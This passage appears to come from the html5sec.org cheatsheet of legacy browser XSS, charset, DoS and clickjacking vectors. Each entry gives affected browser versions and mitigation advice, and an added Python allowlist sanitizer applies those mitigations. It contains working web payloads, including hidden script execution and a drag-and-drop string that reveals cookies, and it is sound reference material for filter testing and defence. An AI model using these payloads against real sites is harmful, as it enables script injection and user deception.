<?xml version="1.0"?> <Schema name="x" xmlns="urn:schemas-microsoft-com:xml-data"> <ElementType name="img"> <AttributeType name="src" required="yes" default="x"/> <AttributeType name="onerror" required="yes" default="alert(1)"/> <attribute type="src"/> <attribute type="onerror"/> </ElementType> </Schema>
(file test.xdr, crossdomain: 1, path: http://html5sec.org/test.xdr)
- Internet Explorer 6.0
- Internet Explorer Latest (In Older Docmodes)
Active JavaScript execution via XLink (#81)
Firefox supports the "xlink:actuate" attribute and displays XML links without additional styles. The default namespace here is "html".
<x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:alert(1)" xlink:type="simple"/>
- Firefox 3.0
- Firefox 3.6.28
JavaScript execution via XML stylesheet, data URI and expression() (#82)
Internet Explorer 8 to 10 support data URIs and are thus capable of including stylesheets this way. By using an XML stylesheet tag and a data URI containing an expression() it is possible to execute JavaScript without user interaction.
<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>
- Internet Explorer 8.0
- Internet Explorer 10.0
Obfuscated WML injection via undeclared WAP-ML Variables (#83)
The example demonstrates the use of undeclared variables in WML (they are ignored). Such variables can be declared via the <setvar>, <input> and <select> tags. The namespace is given so the markup can be used inside an XML file. Many regular HTML tags can also be used inside WML files.
<x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)"><x:timer value="1"/></x:template>
- Opera 9.X
- Opera 12.0
Opera JavaScript execution via XML-events handler (#84)
The browser tries to load an external XML-event handler and execute JavaScript without user interaction. The problem seems to be fixed in Opera 11.
<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:alert(1)//#x"/>
- Opera 9.X
- Opera 11.01
Arbitrary payload injection in Opera via XML-events handler (#85)
The browser loads an external xml-event handler, which contains the JavaScript code. This example also works with data URIs.
<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="test.evt#x"/>
<script xmlns="http://www.w3.org/1999/xhtml" id="x">alert(1)</script>
(file test.evt, crossdomain: 1, path: http://html5sec.org/test.evt)
- Opera 9.X
- Opera 12.0
Executing JavaScript with WD-XSL, <eval> elements and "expr" attributes (#135)
Internet Explorer, when loading an XML document in an older document mode, allows the use of a legacy XSL version called WD-XSL. This version, shipped with several proprietary extras, allows execution of JavaScript and other script code in very uncommon ways. The browser for instance supports an <eval> element and "expr" attributes that can directly be fed with script code or references to existing JavaScript and XMLDOM methods. Unlike MSXSL script, WD-XSL allows direct DOM access.
<?xml-stylesheet type="text/xsl" href="#" ?> <stylesheet xmlns="http://www.w3.org/TR/WD-xsl"> <template match="/"> <eval>new ActiveXObject('htmlfile').parentWindow.alert(1)</eval> <if expr="new ActiveXObject('htmlfile').parentWindow.alert(2)"></if> </template> </stylesheet>
Websites rendered in XML- or XML-like MIME types should not allow untrusted input without heavy filtering. Unknown elements can cause unexpected script execution depending on browser and render mode. The use of custom namespaces in user generated input should be prohibited.
- Internet Explorer 5.5
- Internet Explorer Latest (In Older Docmodes)
UTF7 and other exotic charset based vectors
XSS via x-imap4-modified-utf7 (1) (#2)
This vector shows how UTF-7 derivations can be used to generate very hard to detect XSS vectors in exotic charsets.
<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
Make sure no <META> tags can be injected and the website is delivered with a charset.
- Firefox 2.X
- Firefox 3.6.28
XSS via x-imap4-modified-utf7 (2) (#3)
This vector shows how UTF-7 derivations can be used to generate very hard to detect XSS vectors in exotic charsets.
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
Make sure no <META> tags can be injected and the website is delivered with a charset.
- Firefox 2.X
- Firefox 3.6.28
XSS via ¼ and ¾ in MacFarsi, MacArabic and MacHebrew (#19)
Buggy charset implementations in Firefox allow crafting HTML structures without using the usual characters such as < and >. Most affected charsets are from the Mac charset family, such as mac-farsi, mac-arabic and mac-hebrew.
<meta charset="x-mac-farsi">¼script ¾alert(1)//¼/script ¾
User input should never allow <META> tags, to avoid re-setting the charset. In case the website is encoded in one of the affected charsets, make sure your filter is aware that for Firefox < and ¼ are equivalent, as are other characters.
- Firefox 2.X
- Firefox 3.6.28
Client side denial of service vectors
Client-side denial of service via repeat templates (#13)
This vector uses the repeat template syntax specified in the WebForms 2.0 draft. By using nested tags repeating themselves over and over again, the client can be forced to deny service or even crash.
<x repeat="template" repeat-start="999999">0<y repeat="template" repeat-start="999999">1</y></x>
Avoid allowing users to submit HTML containing "repeat" or "repeat-start"/"repeat-end" attributes. If necessary, validate the numerical values used for them to be reasonably small.
- Opera 10.0
- Opera 10.10
Client-side denial of service via faulty regular expressions (#14)
Opera 10 allows client side validation via the pattern attribute. In case the pattern value is a badly written regex the client can be "dossed" with short customized character sequences.
<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>
Don't allow users to submit HTML containing "pattern" attributes and make sure your own client side regular expressions used for validation are well written and not vulnerable against easy ReDoS attacks.
- Opera 10.0
- Firefox 12.0
- Firefox Latest
Input stealing/form DoS with onblur=focus() and autofocus (#22)
This very basic vector demonstrates how the combination of "autofocus" and "onblur" can render any other form on the targeted website useless.
<input onblur=focus() autofocus><input>
User submitted markup should not contain "autofocus" attributes.
- Opera 9.0
- Opera Latest
- Chrome 3.0
- Chrome Latest
- Safari 5.0
- Safari Latest
HTML behavior and binding vectors
Using onbegin and HTML+TIME to execute JavaScript (#16)
The HTML+TIME behavior allows using arbitrary tags to execute JavaScript via onbegin event handlers.
X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >
Don't allow behavior properties in user submitted CSS and markup and don't rely on blacklists regarding dangerous HTML tags. The rather unknown HTML+TIME API provides too many ways to execute JavaScript, with and without user interaction, in exotic ways. Avoid blacklists if possible.
- Internet Explorer 5.5
- Internet Explorer 8.0
JavaScript execution via HTML+TIME without user interaction (1) (#24)
This obfuscated vector uses HTML+TIME to execute JavaScript without user interaction - and without suspicious event handlers but just "attributename" and "to" attributes.
1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(1)>`>
Don't allow behavior properties in user submitted CSS and markup and don't rely on blacklists regarding dangerous HTML tags. The rather unknown HTML+TIME API provides too many ways to execute JavaScript, with and without user interaction, in exotic ways. Avoid blacklists if possible.
- Internet Explorer 5.5
- Internet Explorer 8.0
JavaScript execution via HTML+TIME without user interaction (2) (#28)
This HTML+TIME vector utilizes the attributes "attributename" and "values" to map encoded markup into an attribute to execute JavaScript.
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>
As soon as the HTML+TIME namespace and the behavior property are mapped to an HTML element, a whole range of new attributes to execute JavaScript becomes available. In user submitted HTML, "xmlns" attributes should not be allowed, nor should "behavior" properties in style tags and attributes. Don't rely on blacklisting when dealing with user submitted markup.
- Internet Explorer 5.5
- Internet Explorer 8.0
VML frame with embedded VML object plus onmouseover (#34)
A VML frame object works by giving the VML frame a "src" attribute and having it point to another VML object. A VML frame object in quirks mode can enclose a VML rect object or regular HTML which responds to mouseover events.
1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>
Don't allow behavior properties in user submitted CSS and markup and don't rely on blacklists regarding dangerous HTML tags.
<xml> <rect style="height:100%;width:100%" id="xss" onmouseover="alert(1)" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>
(file test.vml, crossdomain: 1)
- Internet Explorer 5.5
- Internet Explorer Latest (In Older Docmode)
VML line object utilizing href attribute with JavaScript URI (#35)
The vector paints a very thick and wide line responding to clicks with JavaScript execution via JavaScript URI. Note that the actual URI is being masked in the status bar. During an overlay attack the victim will not know about the payload via status bar.
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
Don't allow behavior properties in user submitted CSS and markup and don't rely on blacklists regarding dangerous HTML tags.
- Internet Explorer 5.5
- Internet Explorer Latest (In Older Docmode)
AnchorClick behavior enabling folder attribute as href replacement (#36)
Using the AnchorClick behavior allows using the "folder" attribute as a replacement for the "href" attribute on <A> elements. This example works up to IE 8 standards mode.
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>
Don't allow behavior properties in user submitted CSS and markup and don't rely on blacklists regarding dangerous HTML tags.
- Internet Explorer 5.5
- Internet Explorer Latest (In Older Docmode)
Internet Explorer Scriptlets executing JavaScript#52test
Internet Explorer supports Scriptlets as an alternative binding method for Data Islands. With the example shown, JavaScript executes without user interaction.
<x style="behavior:url(test.sct)">
Users should not be able to submit either CSS or HTML containing style attributes. If necessary, make sure the "behavior" property is not whitelisted.
<SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS> <SCRIPT Language="javascript">alert(1)</SCRIPT> </SCRIPTLET>
crossdomain: 0
name: test.sct
- Internet Explorer 5.5
- Internet Explorer Latest (In Older Docmodes)
Internet Explorer Data Islands executing JavaScript#53test
Internet Explorer supports Data Islands as an XML-like binding method. With the example shown, JavaScript executes without user interaction.
<xml id="xss" src="test.htc"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
Users should not be able to submit HTML containing <XML> tags. If necessary, make sure the "dataformatas" and "datasrc" attributes are not whitelisted.
<?xml version="1.0"?> <x> <payload><![CDATA[<img src=x onerror=alert(1)>]]></payload> </x>
crossdomain: 0
path: http://html5sec.org/test.htc
name: test.htc
- Internet Explorer 5.5
- Internet Explorer Latest (In Older Docmodes)
Server-sent events - Opera and <EVENT-SOURCE> tags (1)#73test
Opera allows using <EVENT-SOURCE> elements. If the "src" attribute points to a valid cross-domain source, the element can listen for events and the data they contain.
<event-source src="event.php" onload="alert(1)">
Make sure users cannot influence the source of <EVENT-SOURCE> elements and don't whitelist the tag itself inside user submitted markup.
<?php header("Content-Type: application/x-dom-event-stream"); die("Event: load\ndata: \n\n"); ?>
crossdomain: 1
path: http://html5sec.org/event.php
name: event.php
- Opera 8.X
- Opera 10.63
Server-sent events - Opera and <EVENT-SOURCE> tags (2)#74test
Opera allows using <EVENT-SOURCE> tags to receive server-sent events. In this example a data URI is used as the event source, triggering a click on another HTML element. In an attack scenario an XSS requiring user interaction can be turned into active script execution this way.
<a href="javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A" /></a>
Make sure users cannot influence the source of <EVENT-SOURCE> elements and don't whitelist the tag itself inside user submitted markup.
- Opera 8.X
- Opera 10.63
Internet Explorer applying behavior via <import namespace>#116test
Internet Explorer allows namespaces to be applied and behaviors to be attached not only through CSS but also via <import> or <?import> tags. The example shows how to use HTML+TIME behaviors without style attributes or tags and how to cause script execution via the "to" attribute. Without a "targetElement" attribute, the "innerHTML" property of the <body> tag is overwritten; to limit the area that gets changed, use the "targetElement" attribute. This syntax is also supported in IE9 for non-obsolete behaviors.
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<img src=x:x onerror=alert(1)>">
- Internet Explorer 6.0
- Internet Explorer 8.0
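An allowlist-based sanitizer that applies the mitigations given for the vectors above: no "behavior" (or url()) in style values, no "xmlns" or data-binding attributes, no <xml>, <import>, VML or <event-source> elements, and only relative or http(s) URLs in "href"/"src". This is an added example, not code from html5sec.org; the tag and attribute allowlists and the choice of Python's html.parser are assumptions for the demonstration.

```python
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED_TAGS = {"a", "b", "i", "p", "br", "div", "span", "img"}  # assumed allowlist for this example
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}, "div": {"class", "style"}, "span": {"class", "style"}}
DROP_CONTENT = {"script", "style", "xml", "scriptlet"}  # their text content never reaches the output
# IE "behavior"/"expression" and url()/@import are what pull in .htc, .sct and .vml resources.
UNSAFE_STYLE = re.compile(r"behavior|expression|url\s*\(|@import", re.I)

def safe_url(value):
    cleaned = re.sub(r"[\x00-\x20\x7f]", "", value)  # browsers ignore these before the scheme
    return urlsplit(cleaned).scheme in ("", "http", "https")  # relative, http or https only

def attr_ok(tag, name, value):
    if name not in ALLOWED_ATTRS.get(tag, ()):
        return False  # drops on*, xmlns*, folder, datasrc, datafld, dataformatas, ...
    if name in ("href", "src"):
        return safe_url(value)  # refuses javascript:, data:, feed:, vbscript: ...
    return name != "style" or not UNSAFE_STYLE.search(value)

class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], 0  # skip > 0 while inside a DROP_CONTENT element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip += 1
        elif not self.skip and tag in ALLOWED_TAGS:  # vmlframe, line, event-source, import, t:set vanish
            attrs = [(name, value or "") for name, value in attrs]
            kept = "".join(f' {n}="{escape(v)}"' for n, v in attrs if attr_ok(tag, n, v))
            self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in ALLOWED_TAGS and tag not in ("br", "img"):
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data))

def sanitize(markup):
    parser = Sanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)
```

Run the payloads from the entries above through sanitize() to see each one reduced to inert text; a deployed system should use a maintained sanitizer with the same allowlist discipline.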
Clickjacking and UI Redressing vectors
Reverse clickjacking via <IFRAME>#117test
Internet Explorer allows placing <IFRAME> tags inside <A> tags. Clicking on a non-clickable element inside the IFRAME navigates to the URL defined in the "href" attribute of the <A> tag.
<a href="http://attacker.org"> <iframe src="http://example.org/"></iframe> </a>
- Internet Explorer 8.0
- Internet Explorer 9.0
Text injection by drag-and-drop#118test
Using the "setData" method together with the "ondragstart" event handler and the "draggable" attribute set to "true", the text "malicious code" rather than "Drop me" is dragged into the IFRAME. This IFRAME can hold a web page with an input field to drop data into. Note that cross-origin drag&drop has meanwhile been heavily restricted due to security risks.
<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain','malicious code');"> <h1>Drop me</h1> </div> <iframe src="http://www.example.org/dropHere.html"></iframe>
- Opera 12.0
- Firefox 3.X
- Firefox 15.0
- Safari 5.0
- Safari 5.1.7
Content extraction via view-source#119test
To show the source code of a web page inside Mozilla Firefox or Google Chrome, "view-source:" can be used as a prefix for the URL. Firefox, and that is essential for this vector, allows iframes to show view-source: URLs. In combination with a "textarea" tag, only two drag operations are needed to perform this attack, as with elements like images: the first drag selects an element and the second drags the element out of the iframe into the text area. This method also bypasses CSS and JS based clickjacking protection.
<iframe src="view-source:http://www.example.org/" frameborder="0" style="width:400px;height:180px"></iframe> <textarea type="text" cols="50" rows="10"></textarea>
- Firefox 2.X
- Firefox 13.0
Pop-up blocker bypass#120test
A web browser like Firefox distinguishes between trusted and untrusted events, depending on the situation. User interactions like a click are trusted because they are made explicitly by the user. If a web page initiates an event like opening a pop-up window automatically, the event is not trusted and is therefore blocked. Tests have shown that other browsers like Google Chrome or Opera behave similarly. With clickjacking techniques, an attacker can get the victim to create a trusted event by clicking on a link that opens one or more pop-up windows. Thus, an attacker can get the victim to unknowingly trigger a trusted event with a single click. This event can be recycled by the attacker for later use or used directly, e.g. to generate pop-up windows that the user does not want.
<script> function makePopups(){ for (i=1;i<6;i++) { window.open('popup.html','spam'+i,'width=50,height=50'); } } </script> <body> <a href="#" onclick="makePopups()">Spam</a>
- Internet Explorer 5.0
- Internet Explorer 9.0
- Firefox 2.X
- Firefox Latest
- Chrome 6.0
- Chrome 23.0
- Safari 5.0
- Safari 5.1.7
SVG masking#121test
Masking elements can greatly simplify a clickjacking attack. Here, a "body" tag with the "style" attribute "background:gray" is given; as the name suggests, the background of the web page will be gray. The "iframe" tag holds the attributes "src" and "style". The URL of the target web page is the value of the "src" attribute. The "style" attribute specifies the width, the height and the border of the framed page and, finally, the property "mask" with "url(#maskForClickjacking)". This "url" points to an SVG element with the "id" value "maskForClickjacking". On the next line, an "svg" tag in the "svg" namespace is defined. Inside it is a "mask" tag with the attributes "id", "maskUnits" and "maskContentUnits". The attribute "id" holds the value "maskForClickjacking", which is exactly the value inside the "url". The attribute "maskUnits" defines the coordinate system for the values of "x", "y", "width" and "height"; the second attribute "maskContentUnits" defines the coordinate system for the contents of the "mask", here "objectBoundingBox". Inside the "mask" tag there are two tags, "rect" and "circle". Each holds position information and, depending on the geometric shape, a width and height or a radius. The attribute "fill" with the value "white" ensures that the viewing hole in the mask is visible.
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:svg="http://www.w3.org/2000/svg"> <body style="background:gray"> <iframe src="http://example.com/" style="width:800px; height:350px; border:none; mask: url(#maskForClickjacking);"/> <svg:svg> <svg:mask id="maskForClickjacking" maskUnits="objectBoundingBox" maskContentUnits="objectBoundingBox"> <svg:rect x="0.0" y="0.0" width="0.373" height="0.3" fill="white"/> <svg:circle cx="0.45" cy="0.7" r="0.075" fill="white"/> </svg:mask> </svg:svg> </body> </html>
- Firefox 3.X
- Firefox Latest
Sandboxed Iframes#122test
Google Chrome implements the HTML5 "sandboxed iframes". This particular example shows how to turn this feature against websites that rely only on JavaScript based frame-busters. Note that the framed website can still execute JavaScript but has no privilege to modify the top frame's location. That would only be possible if the sandbox attribute also contained the "allow-top-navigation" value.
<iframe sandbox="allow-same-origin allow-forms allow-scripts" src="http://example.org/"></iframe>
- Chrome 8.0
- Chrome Latest
- Internet Explorer 10.0
- Internet Explorer Latest
- Safari 5.1.7
- Safari Latest
- Opera 15.0
- Opera Latest
Classjacking with jQuery#123test
CSS offers the attribute "class" as a selector to style a group of HTML elements, so it is possible to style e.g. "span" and "a" tags. Here, the "span" tag has the value "foo" and the "a" tag the value "bar" inside the "class" attribute. These values can be used to define the font size or other CSS-specific properties. The first "script" tag holds a "src" attribute with the value "http://code.jquery.com/jquery-1.4.4.js", a reference to a file of the "jQuery JavaScript Library v1.4.4". jQuery is a JavaScript library that simplifies HTML document traversing, event handling, animating, and Ajax interactions, so it is ideally suited to handling and manipulating user interactions, as required for complex UI redressing attacks. jQuery is therefore used in the second "script" tag. First, the "span" tag holding the value "foo" in its "class" attribute is selected. Then ".click" is applied; it can be used to bind an event handler to the "click" JavaScript event, or to trigger that event on an element. In this case, an alert window with the text "foo" is shown after clicking on the "Some text" value of the "span" tag. After closing the alert window, a click event is triggered on the "a" tag with the value "bar" inside its "class" attribute. Analogous to the first event, an alert window appears with the text "bar". After closing the alert window, the web browser redirects to "http://html5sec.org". If the link "http://www.example.org" is clicked instead of the text "Some text", an alert window is displayed with the text "bar", followed by a redirection to "http://example.org" and not "http://html5sec.org". This behaviour follows from the "href" attribute.
<span class=foo>Some text</span> <a class=bar href="http://www.example.org">www.example.org</a> <script src="http://code.jquery.com/jquery-1.4.4.js"></script> <script> $("span.foo").click(function() { alert('foo'); $("a.bar").click(); }); $("a.bar").click(function() { alert('bar'); location="http://html5sec.org"; }); </script>
- Internet Explorer Latest
- Opera 10.X
- Opera Latest
- Firefox 2.X
- Firefox Latest
- Chrome 8.0
- Chrome Latest
- Safari 5.0
- Safari Latest
Passive XSS via Drag&Drop of specially crafted URIs#131test
It is possible to bypass Mozilla Firefox's internal protection (tested on versions 8.x and 9.x) and execute JavaScript via drag and drop by using capitalization and the feed: protocol, and to run that JavaScript on the top page if the malicious page can be included in an IFrame. The "event.preventDefault()" call in the "ondragover" event of the element blocks the browser's default handling. Usually the malicious IFrame would have to deceive the user into dragging and dropping a JavaScript string into the drop box, which can be concealed in a hidden "textarea" element.
<b>drag and drop one of the following strings to the drop box:</b> <br/><hr/> jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// <br/><hr/> feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// <br/><hr/> feed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b> <br/><hr/> feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);// <br/><hr/> <div id="dropbox" style="height: 360px;width: 500px;border: 5px solid #000;position: relative;" ondragover="event.preventDefault()">+ Drop Box +</div>
- Firefox 6
- Firefox 10.0.2